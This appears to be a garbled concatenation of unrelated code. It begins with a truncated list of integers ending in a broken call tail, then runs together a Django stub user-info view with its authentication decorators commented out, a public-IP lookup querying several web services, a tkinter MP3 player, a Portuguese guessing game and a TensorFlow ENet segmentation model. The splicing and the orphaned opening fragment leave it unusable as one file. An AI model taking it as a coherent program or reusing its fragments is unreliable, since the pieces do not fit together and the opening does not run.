-8165, 5285, 855, -9860, -6691, -4938, -8383, 8469, 9866, -2018, 5881, -1886, 1628, -8942, 1796, 1784, 7566, -664, -7988, -1122, 3273, -9698, 30, -6181, -53, 5338, -8205, -1778, -2314, -1918, 5216, 4139, -6, -3862, -7266, 6453, 5900, -9317, -9951, 7957, 6051, -4461, 4780, -1958, 5102, -7137, -1646, -3713, 5385, -181, -9202, -8875, 701, -8429, 3909, -1511, -730, -2978, -8473, -6609, 7017, 1576, 7376, 6034, -9035, -1676, 9916, -9066, 3552, 3194, -5149, 5556, 8723, -6002, -3145, -6395, -2869, -3084, 4932, -5786, 4396, 296, 9078, -8749, -8555, -8535, 5879, 8207, -3911, -7899, -8939, 9099, -8586, -3409, 426, 2359, 2411, -708, 5812, -1322, 6582, -2972, 3384, 2754, 3677, 3230, -2505, -8885, 3442, 985, -7847, 6572, -1467, -1159, 6338, 4665, 3384, 764, 6884, -3991, -973, -1767, 7794, 4346, -9426, 2377, 7398, -7567, -3223, 4946, -1897, 9526, 9584, -3090, 6576, 6490, 2393, -7127, -2749, 3435, 7985, 8288, 2663, 2432, 5092, -9128, -9097, 6512, -2619, -371, 7230, 2883, -8812, -2766, 1077, 9924, 306, -3422, -2384, -9688, -5784, -5199, -210, 8461, 4600, 8582, -3059, -2449, 399, 3632, -7794, -8893, 4640, -1663, 3329, 7675, 6929, -219, -4771, -336, -2195, -176, 2457, 43, 9265, -8531, -4480, -9764, -5827, 4286, -9626, 4304, 771, -8374, -2941, -8388, 5080, -2700, 4923, 7961, 6637, 4748, -9305, 381, 9711, 6710, -9789, -6786, 5852, 4802, -1623, -8412, -3011, -7224, 8780, 36, 2926, -7427, -6119, 4857, 1917, 1420, 5849, -5350, -7533, -9203, 8084, 8413, -662, 9794, -9673, -9374, -7162, -8259, -1665, 5862, -6450, 2195, 2951, -8189, 2356, 2510, -2053, -145, -3615, 655, 9303, 5047, 4727, 7095, -4732, 3909, 1247, 4761, -9727, 9333, -4075, 3956, -9216, 8914, -712, -4652, 5483, 4205, 8683, 8579, -8181, 8908, -5597, 2476, 9851, -8286, 4681, 8122, 523, 9587, -6945, -3196, -2482, -4412, -3395, 1954, 7730, 3240, 9205, -1425, -7951, -1529, 5070, -9058, -5262, -1071, 2628, 2119, 1187, 1785, 9053, -1236, -4350, 9514, -4140, -6287, -9819, 4239, -6232, 4381, 9870, -8655, -8883, -4320, -5493, -8401, 1917, 
8564, -1499, -9067, -9032, -7790, 8675, -1875, 3098, 4154, -3831, 6858, 5228, -1953, -2657, -1852, 7460, -2909, 6159, 8547, 3811, -9568, -6494, 7218, 6830, -7000, -5304, 641, -6105, 4465, -1477, 7359, 1859, 7443, 7863, 201, -6931, -7456, 2776, -6024, 6257, -6793, 4860, 1010, 9562, -7871, -6683, 6948, -5061, -6607, 7863, 6768, -7665, -9658, -9090, -450, -8760, -3686, -5741, -8431, 7684, 9554, 8533, 3271, 3614, 2049, 4676, 6949, -1034, -1224, 6507, 6436, -1495, -7112, -9010, -5755, -9167, 2987, 4326, -3364, -5317, -4659, -3744, 5518, -1354, -8478, -4987, -9109, -8762, 2315, -3433, 5133, 4076, -7509, -266, -1824, -8496, -1007, -9268, 6833, 6946, 2489, -87, 8460, 5810, -5932, -1301, 9269, -9598, 8274, -4062, -1880, 5898, -5156, -6833, 5397, 851, -2689, -9986, 2594, 8392, 7710, 6770, -4543, 9231, -4362, 6830, 1378, 5229, 7636, 1007, 4315, 3905, -4696, -93, -2543, -5969, 5205, -4351, 2424, 5153, 4541, 2823, 7845, 6007, -3937, 1565, 4221, 9716, 5555, 3039, -1257, 1620, -6087, -6831, -9530, -2707, -8159, 3237, -1943, 6579, -5186, 9287, -7381, 6343, -7908, -1832, 9705, -4398, 6628, 3569, -7759, -414, -5118, -1390, 9825, 3384, 9854, -7900, 6180, 79, 12, 9206, 3454, -16, -897, 8636, -6862, -1512, 9916, 3028, -1892, 9123, 237, -4596, 2223, 4915, 4245, 8471, 3145, 4929, -1663, -1432, 6396, -3021, 9991, -2070, 6962, 4232, -2, 6032, -8205, 1875, -4463, -6013, -1629, -4443, -2232, -5670, 6090, 2965, -7886, 6471, -6287, 8477, 3726, -7786, -2911, 2044, -5674, -1099, 5844, -7173, -3780, 7568, 9486, -1054, -5024, 8196, -8078, -9287, 9605, 8692, 2588, 1080, -6142, -1043, -3334, -6093, 9346, 3723, 8409, -6046, 5223, 2463, 994, 9234, -5633, 2241, 9155, 1396, -2868, -831, 1741, 7584, -2709, 5365, -4176, 8363, -4919, -6503, 6197, 7942, 3834, 6613, -3791, 9293, 4224, 6063, -8395, -4436, 4133, -8830, -4601, -8647, 301, -9384, -200, -1515, 8649, -9042, 9771, 4205, -367, -1300, -9003, 8064, 8994, -5115, -3678, 9449, 7026, 5729, 2537, 1938, -8615, -2181, 7565, 9071, 289, 9910, 2964, 6222, 451, 
7771, 3048, 2129, -6886, -3071, 8677, -5341, 6582, -2358, -976, 5397, -7824, 8752, 3686, 7805, 3622, 418, 9647, 856, -9219, 2356, 1769, 6299, -4967, -2461, -9284, -810, 8659, -153, -9792, 4835, -565, 4593, -7860, -5157, 8767, -8148, -9021, 4641, 2977, -4476, -1103, 8532, 1237, -9415, 100, -4491, -4350, -4976, 8197, -6850, 619, -5293, -5950, -3685, 299, -4628, -3103, 5284, 6289, 559, 6177, 7028, 3791, 7319, -1030, -5207, 4794, -701, -7067, 1619, 6920, 2998, -8049, -9210, -7791, -3143, 2509, -1828, 7594, -1410, 2623, 6528, -6950, 2738, 2196, -1022, -9486, 3887, 9375, -2839, 1381, -8621, 5846, -8720, -3662, -9117, -9643, -6332, -293, -6924, -41, 4510, -9457, 7817, -1929, -9560, -4770, 4297, 9208, -3117, 7883, 1879, 8616, 4745, 2166, -8102, 9556, -9849, 473, -2625, 3167, 9097, 2319, -614, -4915, 4364, -9126, -1396, -7785, 6975, 2755, 9795, 7318, 6635, -3036, -8696, 9048, 886, 952, -6649, 6309, 1654, -7272, -9372, 1995, -4147, -6932, -432, 9907, -8066, 5126, -9885, 9326, 3649, 4120, 5228, -3353, 1418, -547, -1036, 5093, 5523, 6963, -7455, 1059, -7098, 9670, -7128, 2348, -5564, 8458, 9658, -1420, -2290, -8012, 7478, 4640, -1075, 6789, 6604, -4592, -3028, -2585, 9500, 6012, 4460, 4608, -7859, 5520, 5915, 5938, -2544, 4038, 6538, 97, 1139, -6919, 868, -8810, -1265, -4957, -5275, -5009, -6900, 2472, 6405, -6938, 599, -40, -7591, -2604, 4011, 2606, -9153, 3765, 109, 453, -9030, -7965, 1426, 2411, -2583, -6443, 9259, 4015, 5438, -3920, -1707, -3399, 6313, 2830, 9762, -2803, 2491, -9006, -7352, -9156, -6332, 6129, -5394, 7486, 9382, 5667, -3608, -4805, 8519, -7380, -933, 753, 8690, 291, 2587, 4374, 9215, -7612, 4200, -441, -9389, -1364, 4441, 2108, -4606, 9838, -4745, 2951, -8930, -251, -4879, 9909, -7554, 3517, 7017, 5708, 3589, 5049, -1549, 7852, -7867, -7224, -6858, 4170, -7827, -2532, 4164, 6364, 4352, 8013, 8669, 6925, -6265, 4213, -1371, 4036, -9165, -8875, -3407, 1441, 7545, 7446, -5367, -7645, -5455, -6001, -314, 36, -6457, 8012, 6874, 228, 8368, 6324, -3448, 5437, 
1780, -8969, -1748, 750, 6859, -5643, 1462, 4308, -2763, 3732, 3624, -6955, -4086, 6970, -103, -4687, -7967, 29, 2295, 88, -7483, 5297, -6540, -3535, 2937, -8392, 9387, -2093, 9209, -5985, -8373, 1660, -6458, -6384, -7709, 5486, -7066, 5493, -6871, -6256, 4044, 7899, -5494, -6828, -1719, 7870, -2942, 3335, -560, 1599, 8471, 8024, 9454, -8908, -3472, 5704, -993, 5362, 450, 3368, 715, 7233, -7863, -3340, 883, -4914, -6821, 9509, -4592, -6159, 6092, 3128, 9382, 3270, -3867, -2661, -2069, -1576, -4103, -6719, 9930, -4993, -8546, -338, -2599, 1342, -7734, -1790, -4712, -3933, -8226, 7534, -9892, -6259, -2034, -9166, 9964, 3886, 4679, -1688, 1331, -3121, 5671, -9478, 3651, 5816, -9261, -383, 4502, -3604, -1414, 1074, 1921, 8367, -2400, -1038, 9906, -2950, -6864, -4427, 9025, -6054, -9743, -9895, 2900, 3893, -2311, 6678, -5579, -1269, 6253, -5697, -656, 6070, 5125, -5472, -644, -2224, 9502, -9790, 5901, -2314, -8130, -9828, -3511, -4432, -7015, 1701, -9631, -5545, -5070, 2562, -7374, 5553, -5712, 9640, -3967, -9653, -8201, 1065, 8112, -68, 7836, 9707, 3491, -1091, -6089, 6055, 3646, -8199, 4653, -1345, 4693, -698, 6622, 5838, -4299, 9166, -6125, 7709, -5094, -3823, -6838, -8223, 9726, -1796, 9495, 5776, 7576, 2777, 751, 493, 2770, 1161, 9269, -9357, -6066, -8382, -7763, 3247, -249, 5494, 1324, -5611, 1602, -3849, 7539, 5290, -3859, 8617, 6201, -5349, 2450, 2730, 5361, -3119, -4996, -3954, -7018, -3590, 5559, -9706, 2429, 4993, 2461, 8591, 9266, -8253, 6979, 7880, -7738, -6465, 4140, 4209, 5278, 5318, -8771, 5831, 9500, 6750, 5736, 9717, 466, -8383, 5713, 8822, -3305, 2839, -774, 4427, 8962, -8693, -6294, 6510, 5469, -6665, 2205, -1038, 2464, 162, -6595, -2480, -9316, 6656, 3494, -9844, -6351, 8312, 6161, -1657, -9185, 6412, 4653, -6076, 6088, -4571, 1652, 323, 1937, 1478, 8124, -422, -2631, 2720, -4944, 8270, 2829, -2098, -932, 1201, -3717, 8991, 932, 718, -4135, 3712, 9620, -8351, 3881, 7865, -7652, 8485, -6904, -1993, -121, -5173, 5867, 2310, -1908, 8103, 6182, -5321, 
-9562, -2189, 7669, -3832, 8487, 2565, 6382, 5576, -3068, -5091, -9233, 3253, -1805, -3150, -2287, -1249, 8289, -3604, 6512, 7958, 8531, 6573, -9696, 7698, 4755, 5089, -7234, -4705, 1122, 9377, -8683, -8274, -1704, -9941, 1766, 1636, -7545, 7171, 2124, -7366, 7973, 2244, 6882, 7230, 4327, -2430, -1701, 9117, 9699, 6726, -2278, -788, 9359, -2308, 6249, 8002, -7658, -5281, -2121, 4872, 126, 6369, 7443, 7813, -8326, -9467, 8879, -5791, 2888, 3835, 6280, -8876, -5534, -949, 5332, 2559, 3274, -6547, -6310, 6461, -7158, -5007, -9252, 8240, -6738, -6484, -5857, -4892, 555, -8014, -2629, 2318, -1235, 4846, -1618, -1970, 596, -600, -2542, -6107, -3066, -6802, -5773, -9134, 9182, 6792, 7575, 1802, 2275, -1991, -2271, -9520, 7951, 5598, 8089, -5159, -4168, -5510, -2127, 3531, -3065, -685, -2027, -8775, 9577, 4525, -1265, -1296, 3066, 1223, 9614, -150, 4866, -6665, 8184, 4774, -8038, 9339, 6452, -8316, -9043, -1982, 5428, -424, -8287, -9247, 9961, 2987, 4146, -5853, -8877, 812, -8928, -209, 4608, -7533, 4599, -4911, 443, 4149, 7493, 8657, -1412, 4965, -4399, 2163, -785, -6391, 5965, -1863, -5577, -9460, 7953, -8286, 6916, 2685, -2035, 6389, -1883, 3244, -1387, 197, -4757, 5403, -4907, -9135, 9903, 7013, 8202, 5905, -8477, -1242, -720, 6571, -7611, 2799, -7928, -6703, 8424, 3814, -2255, -7835, 8800, -4959, 968, 7071, -8181, 1505, -8102, -7375, -759, -1356, -8300, 4065, 1050, 5892, -7840, 9162, 8176, -3376, -2038, -4830, -2152, -857, 2262, 9436, 7920, 1845, 4977, 3282, -2782, 1751, -2436, -311, 9635, -9256, 8532, 2926, -3560, 3285, -4808, -2535, -408, 4570, -4284, 1813, 414, -6474, 1469, -9457, -2925, 178, -4673, -8458, -3136, 4306, 8611, -6467, 8884, 844, 7820, -8859, -4457, 6967, 8350, -9626, -2092, 6446, -68, -9188, 9695, -1542, 9781, -3129, -4665, -6887, -6306, -7407, -8425, -8042, 4860, -1142, 5698, 3718, 8018, -8998, -5819, 2090, -5924, 1368, -9725, 4829, 9898, -2378, -8216, -9563, 9072, 5163, -2924, -9521, -4348, -1755, 6865, 5077, 330, 8497, 967, -1957, -8276, -6991, 
5907, 8247, -477, 4518, 3125, 1547, 9597, 376, -4482, -7920, -3099, 4033, 9484, 1451, 592, 301, 8593, 697, 6525, -6717, 5739, 7705, -2939, 6698, -3615, 4289, -790, -6611, -3816, -9452, 2461, -5813, -298, 1595, 8882, -6198, -3236, -2533, 1305, -2669, -6043, 2596, -4411, -7858, 7994, -4318, 1225, 2946, 2731, -6192, 7305, -7406, -5395, -6719, 8300, -8384, 2061, 1192, -4434, -3178], -8645))
python
from django.shortcuts import render
from utils.api_response import JsonResponse
from rest_framework.decorators import (api_view, authentication_classes,
                                       permission_classes)
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from rest_framework.permissions import IsAuthenticated


@api_view(['GET'])
# @authentication_classes((JSONWebTokenAuthentication, ))
# @permission_classes((IsAuthenticated, ))
def user_info(request):
    """Return the current user's profile information (hard-coded stub data)."""
    payload = {
        'nickname': 'karl',
        'avatar': 'avatar',
        'mobile': '138000000',
    }
    return JsonResponse(data=payload)
python
import re
import logging
import socket
import json
from urllib import request, error, parse

# Regex that pulls the first dotted-quad IPv4 address out of surrounding text.
regex_ip = re.compile(
    r"\D*(" +
    r"(?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\." +
    r"(?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\." +
    r"(?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\." +
    r"(?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)" +
    r")\D*")


def get_ip():
    """Query several providers in order and return the first IP found.

    Falling back across multiple independent services makes the lookup
    robust against any single provider being unavailable.
    """
    for provider in (get_ip_by_taobao,
                     get_ip_by_ipip,
                     get_ip_by_httpbin,
                     get_ip_by_httpbin_direct_1):
        ip = provider()
        if ip:
            return ip
    return None


# The providers below stop working when the local DNS resolver is poisoned.
def get_ip_by_taobao():
    url = 'http://ip.taobao.com/service/getIpInfo.php?ip=myip'
    try:
        raw = request.urlopen(url=url, timeout=10).read()
        payload = json.loads(raw.decode("utf-8"))
        ip = payload['data']['ip']
        logging.info("get ip by taobao: %s" % ip)
        return ip
    except Exception as e:
        logging.warning("get_ip_by_taobao FAILED, error: %s", str(e))
        return None


def get_ip_by_ipip():
    url = 'http://myip.ipip.net/'
    try:
        raw = request.urlopen(url=url, timeout=10).read()
        ip = regex_ip.match(raw.decode("utf-8")).group(1)
        logging.info("get ip by ipip: %s" % ip)
        return ip
    except Exception as e:
        logging.warning("get_ip_by_ipip FAILED, error: %s", str(e))
        return None


def get_ip_by_httpbin():
    url = 'http://www.httpbin.org/ip'
    try:
        raw = request.urlopen(url=url, timeout=10).read()
        ip = regex_ip.match(raw.decode("utf-8")).group(1)
        logging.info("get ip by httpbin: %s" % ip)
        return ip
    except Exception as e:
        logging.warning("get_ip_by_httpbin FAILED, error: %s", str(e))
        return None


# This provider can still resolve the public IP when local DNS is poisoned:
# it connects to the server's address directly and passes the hostname in
# the Host header. To simulate DNS poisoning, add the line
# "127.0.0.1 www.httpbin.org" to the HOSTS file.
def get_ip_by_httpbin_direct_1():
    url = 'http://52.201.109.155/ip'
    try:
        req = request.Request(url=url, method='GET',
                              headers={'Host': 'www.httpbin.org'})
        raw = request.urlopen(req).read()
        ip = regex_ip.match(raw.decode("utf-8")).group(1)
        logging.info("get ip by httpbin_direct_1: %s" % ip)
        return ip
    except Exception as e:
        logging.warning("get_ip_by_httpbin_direct_1 FAILED, error: %s", str(e))
        return None


# Manual smoke test
if __name__ == '__main__':
    print(get_ip())
    print(get_ip_by_taobao())
    print(get_ip_by_ipip())
    print(get_ip_by_httpbin())
    print(get_ip_by_httpbin_direct_1())
python
from tkinter import *
from tkinter import filedialog
from pygame import mixer
import os
import stagger


class MusicPlayer:
    """Minimal tkinter front-end around pygame.mixer for playing MP3 files."""

    # Label text shown before any track has been loaded.
    filename = "MUSIC NAME"

    def __init__(self, window):
        """Build the player window and its Load/Play/Pause/Stop controls."""
        window.geometry('500x400')
        window.title('MP3 Player')
        window.resizable(1, 1)

        Load = Button(window, text='Load Music', width=10, font=('Times', 10), command=self.load)
        Play = Button(window, text='Play', width=10, font=('Times', 10), command=self.play)
        Pause = Button(window, text='Pause', width=10, font=('Times', 10), command=self.pause)
        Stop = Button(window, text='Stop', width=10, font=('Times', 10), command=self.stop)

        self.label = Label(window, text=MusicPlayer.filename, font=('Times', 20), width=25)
        self.label.place(x=60, y=10)

        Load.place(x=200, y=160)
        Play.place(x=200, y=120)
        Pause.place(x=310, y=120)
        Stop.place(x=90, y=120)

        self.music_file = False      # True once a track path has been chosen
        self.playing_state = False   # True while playback is paused

    def load(self):
        """Ask the user for a file and start playing it immediately."""
        chosen = filedialog.askopenfilename()
        if not chosen:
            # Dialog was cancelled -- keep the previous track/state intact.
            return
        MusicPlayer.filename = chosen
        self.music_file = True
        self.play()

    def play(self):
        """(Re)start playback of the currently loaded track."""
        if not self.music_file:
            return
        if not mixer.get_init():
            # Initialize the mixer once instead of on every play() call.
            mixer.init()
        mixer.music.load(MusicPlayer.filename)
        mixer.music.play()
        # A freshly started track is never in the paused state.
        self.playing_state = False
        self.label['text'] = os.path.basename(MusicPlayer.filename)

    def pause(self):
        """Toggle between paused and playing."""
        if not (self.music_file and mixer.get_init()):
            # Nothing loaded/playing yet -- calling mixer would raise.
            return
        if not self.playing_state:
            mixer.music.pause()
            self.playing_state = True
        else:
            mixer.music.unpause()
            self.playing_state = False

    def stop(self):
        """Stop playback entirely (no-op before the mixer is initialized)."""
        if mixer.get_init():
            mixer.music.stop()


root = Tk()
Photo = PhotoImage(file="icon.png")
root.iconphoto(False, Photo)
app = MusicPlayer(root)
root.mainloop()
python
import random
from time import sleep

# Inclusive bounds of the guessing range.
LIMITE_INFERIOR = 0
LIMITE_SUPERIOR = 5

# randint draws uniformly from [0, 5] -- same distribution as
# random.choice([0, 1, 2, 3, 4, 5]) without the throwaway list.
aleatorio = random.randint(LIMITE_INFERIOR, LIMITE_SUPERIOR)

print(20 * '=')
print(" JOGO DA ADIVINHAÇÃO")
print(20 * '=')

# Keep asking until the player enters a valid integer inside the range,
# instead of crashing on non-numeric input or accepting out-of-range guesses.
while True:
    try:
        escolha = int(input("Digite um numero de 0 a 5: "))
    except ValueError:
        print("Entrada inválida, digite um numero inteiro.")
        continue
    if LIMITE_INFERIOR <= escolha <= LIMITE_SUPERIOR:
        break
    print("Numero fora do intervalo, tente novamente.")

print('PROCESSANDO...')
sleep(4)

if escolha == aleatorio:
    print('O numero era {} e você escolheu correto.'.format(aleatorio))
else:
    print('O numero era {} e você errou'.format(aleatorio))

print(20 * '=')
python
import tensorflow as tf
from tensorflow.keras import Model

from . import enet_modules as mod


class ENet(Model):
    """
    ENet semantic-segmentation network.

    https://arxiv.org/pdf/1606.02147.pdf
    """
    def __init__(self, classes,
                 kernel_initializer=tf.initializers.glorot_uniform(),
                 alpha_initializer=tf.initializers.constant(0.25),
                 weight_regularization=None,  # tf.keras.regularizers.l2(2e-4),
                 regularization_scaling=False,
                 drop_rates=[0.01, 0.1, 0.1, 0.1, 0.1],
                 name="ENet"):
        """
        :param classes: number of output classes
        :param kernel_initializer: conv weight initialization scheme
        :param alpha_initializer: PReLU weight initialization scheme
        :param weight_regularization: weight parameter regularization
        :param regularization_scaling: scale regularization constant
                                       according to initialization scheme
        :param drop_rates: spatial dropout rates, one per stage (5 values)
        :param name: name of model scope
        """
        if len(drop_rates) != 5:
            raise ValueError(
                "Illegal argument value @drop_rates, length must be 5."
            )
        self.classes = classes
        super(ENet, self).__init__(name=name)

        # Keyword arguments shared by every module in the network; factored
        # out so the per-stage definitions below only state what differs.
        common = dict(
            kernel_initializer=kernel_initializer,
            alpha_initializer=alpha_initializer,
            kernel_regularizer=weight_regularization,
            regularization_scaling=regularization_scaling)
        # The eight repeated bottleneck variants used by stage 2 (after its
        # downsample) and stage 3, in paper order: plain, dilated 2, 5x5
        # asymmetric, dilated 4, plain, dilated 8, 5x5 asymmetric, dilated 16.
        dilated_variants = [
            {},
            {"dilation_rate": (2, 2)},
            {"asymmetric": True, "kernel_size": (5, 5)},
            {"dilation_rate": (4, 4)},
            {},
            {"dilation_rate": (8, 8)},
            {"asymmetric": True, "kernel_size": (5, 5)},
            {"dilation_rate": (16, 16)},
        ]

        # Initial block
        self.Initial = mod.Initial(16, name="Initial", **common)

        # Stage 1: downsample to 64 channels, then four plain bottlenecks
        self.Bottleneck1_0 = mod.BottleneckDownsample(
            64, name="Bottleneck1_0", drop_rate=drop_rates[0], **common)
        for i in range(1, 5):
            setattr(self, "Bottleneck1_%d" % i,
                    mod.Bottleneck(64, name="Bottleneck1_%d" % i,
                                   drop_rate=drop_rates[0], **common))

        # Stage 2: downsample to 128 channels, then the variant sequence
        self.Bottleneck2_0 = mod.BottleneckDownsample(
            128, name="Bottleneck2_0", drop_rate=drop_rates[1], **common)
        for i, variant in enumerate(dilated_variants, start=1):
            setattr(self, "Bottleneck2_%d" % i,
                    mod.Bottleneck(128, name="Bottleneck2_%d" % i,
                                   drop_rate=drop_rates[1],
                                   **variant, **common))

        # Stage 3: same variant sequence as stage 2, no downsampling
        for i, variant in enumerate(dilated_variants, start=1):
            setattr(self, "Bottleneck3_%d" % i,
                    mod.Bottleneck(128, name="Bottleneck3_%d" % i,
                                   drop_rate=drop_rates[2],
                                   **variant, **common))

        # Stage 4: upsample back to 64 channels
        self.Bottleneck4_0 = mod.BottleneckUpsample(
            64, name="Bottleneck4_0", drop_rate=drop_rates[3], **common)
        self.Bottleneck4_1 = mod.Bottleneck(
            64, name="Bottleneck4_1", drop_rate=drop_rates[3], **common)
        self.Bottleneck4_2 = mod.Bottleneck(
            64, name="Bottleneck4_2", drop_rate=drop_rates[3], **common)

        # Stage 5: upsample to 16 channels
        self.Bottleneck5_0 = mod.BottleneckUpsample(
            16, name="Bottleneck5_0", drop_rate=drop_rates[4], **common)
        self.Bottleneck5_1 = mod.Bottleneck(
            16, name="Bottleneck5_1", drop_rate=drop_rates[4], **common)

        # Final UpConv to per-class logits
        self.Final = mod.Final(self.classes, **common)

    def build(self, input_shape):
        """
        Store the absolute name scopes used in @call to enable scope reuse.
        """
        if self.built:
            return
        # Save name scopes
        with tf.name_scope("Stage1") as scope:
            self._stage1_scope = scope
        with tf.name_scope("Stage2") as scope:
            self._stage2_scope = scope
        with tf.name_scope("Stage3") as scope:
            self._stage3_scope = scope
        with tf.name_scope("Stage4") as scope:
            self._stage4_scope = scope
        with tf.name_scope("Stage5") as scope:
            self._stage5_scope = scope
        try:
            # Temporarily disable checkpointable attr tracking so the plain
            # python output lists below are not tracked as model state.
            self._setattr_tracking = False
            # One list per layer, collecting that layer's output tensor for
            # every invocation of call().
            output_lists = (["initial", "final"]
                            + ["bottleneck1_%d" % i for i in range(5)]
                            + ["bottleneck2_%d" % i for i in range(9)]
                            + ["bottleneck3_%d" % i for i in range(1, 9)]
                            + ["bottleneck4_%d" % i for i in range(3)]
                            + ["bottleneck5_%d" % i for i in range(2)])
            for attr in output_lists:
                setattr(self, attr, [])
        finally:
            self._setattr_tracking = True
        self.built = True

    @property
    def endpoint_outputs(self):
        """
        Returns all endpoint outputs, i.e. all scales from
        Stage 3 to final logits.
        """
        return list(map(list, zip(self.final,
                                  self.bottleneck5_1,
                                  self.bottleneck4_2,
                                  self.bottleneck3_8)))

    def call(self, inputs, training):
        """
        Implements the __call__ building functionality, interconnecting
        the network modules.
        :param inputs:   input tensor (4D tf.Tensor - NHWC)
        :param training: build for training or inference
        :returns: network logits
        :rtype:   tf.Tensor
        """
        initial = self.Initial(inputs, training)
        with tf.name_scope(self._stage1_scope):
            # Stage 1 (argmax indices are kept for the stage-5 unpooling)
            bottleneck1_0, argmax1 = self.Bottleneck1_0(initial, training)
            bottleneck1_1 = self.Bottleneck1_1(bottleneck1_0, training)
            bottleneck1_2 = self.Bottleneck1_2(bottleneck1_1, training)
            bottleneck1_3 = self.Bottleneck1_3(bottleneck1_2, training)
            bottleneck1_4 = self.Bottleneck1_4(bottleneck1_3, training)
        with tf.name_scope(self._stage2_scope):
            # Stage 2 (argmax indices are kept for the stage-4 unpooling)
            bottleneck2_0, argmax2 = self.Bottleneck2_0(bottleneck1_4, training)
            bottleneck2_1 = self.Bottleneck2_1(bottleneck2_0, training)
            bottleneck2_2 = self.Bottleneck2_2(bottleneck2_1, training)
            bottleneck2_3 = self.Bottleneck2_3(bottleneck2_2, training)
            bottleneck2_4 = self.Bottleneck2_4(bottleneck2_3, training)
            bottleneck2_5 = self.Bottleneck2_5(bottleneck2_4, training)
            bottleneck2_6 = self.Bottleneck2_6(bottleneck2_5, training)
            bottleneck2_7 = self.Bottleneck2_7(bottleneck2_6, training)
            bottleneck2_8 = self.Bottleneck2_8(bottleneck2_7, training)
        with tf.name_scope(self._stage3_scope):
            # Stage 3
            bottleneck3_1 = self.Bottleneck3_1(bottleneck2_8, training)
            bottleneck3_2 = self.Bottleneck3_2(bottleneck3_1, training)
            bottleneck3_3 = self.Bottleneck3_3(bottleneck3_2, training)
            bottleneck3_4 = self.Bottleneck3_4(bottleneck3_3, training)
            bottleneck3_5 = self.Bottleneck3_5(bottleneck3_4, training)
            bottleneck3_6 = self.Bottleneck3_6(bottleneck3_5, training)
            bottleneck3_7 = self.Bottleneck3_7(bottleneck3_6, training)
            bottleneck3_8 = self.Bottleneck3_8(bottleneck3_7, training)
        with tf.name_scope(self._stage4_scope):
            # Stage 4
            bottleneck4_0 = self.Bottleneck4_0(bottleneck3_8, argmax2, training)
            bottleneck4_1 = self.Bottleneck4_1(bottleneck4_0, training)
            bottleneck4_2 = self.Bottleneck4_2(bottleneck4_1, training)
        with tf.name_scope(self._stage5_scope):
            # Stage 5
            bottleneck5_0 = self.Bottleneck5_0(bottleneck4_2, argmax1, training)
            bottleneck5_1 = self.Bottleneck5_1(bottleneck5_0, training)
        final = self.Final(bottleneck5_1)

        # Add layer outputs to respective lists
        self.initial.append(initial)
        self.bottleneck1_0.append(bottleneck1_0)
        self.bottleneck1_1.append(bottleneck1_1)
        self.bottleneck1_2.append(bottleneck1_2)
        self.bottleneck1_3.append(bottleneck1_3)
        self.bottleneck1_4.append(bottleneck1_4)
        self.bottleneck2_0.append(bottleneck2_0)
        self.bottleneck2_1.append(bottleneck2_1)
        self.bottleneck2_2.append(bottleneck2_2)
        self.bottleneck2_3.append(bottleneck2_3)
        self.bottleneck2_4.append(bottleneck2_4)
        self.bottleneck2_5.append(bottleneck2_5)
        self.bottleneck2_6.append(bottleneck2_6)
        self.bottleneck2_7.append(bottleneck2_7)
        self.bottleneck2_8.append(bottleneck2_8)
        self.bottleneck3_1.append(bottleneck3_1)
        self.bottleneck3_2.append(bottleneck3_2)
        self.bottleneck3_3.append(bottleneck3_3)
        self.bottleneck3_4.append(bottleneck3_4)
        self.bottleneck3_5.append(bottleneck3_5)
        self.bottleneck3_6.append(bottleneck3_6)
        self.bottleneck3_7.append(bottleneck3_7)
        self.bottleneck3_8.append(bottleneck3_8)
        self.bottleneck4_0.append(bottleneck4_0)
        self.bottleneck4_1.append(bottleneck4_1)
        self.bottleneck4_2.append(bottleneck4_2)
        self.bottleneck5_0.append(bottleneck5_0)
        self.bottleneck5_1.append(bottleneck5_1)
        self.final.append(final)
        self.outputs.append(final)
        return final
python